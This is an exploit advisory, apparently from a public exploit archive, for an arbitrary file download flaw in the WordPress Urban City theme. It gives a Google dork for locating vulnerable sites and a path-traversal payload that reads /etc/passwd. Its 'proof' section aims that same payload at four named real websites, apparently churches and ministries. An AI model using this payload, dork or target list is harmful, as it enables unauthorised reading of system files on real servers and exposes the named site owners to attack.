WordPress Urban City theme suffers from an arbitrary file download vulnerability. Note that this finding houses site-specific data.
c428200eaeadf73d90d6a9c19f0a9f6bbea9fdbc425190ad9733733f38c59da2
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/urbancity
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.nlbcministries.org/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
www.colonialhills.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://iccpaix.org/wpblog/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://praisecovenant.net/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|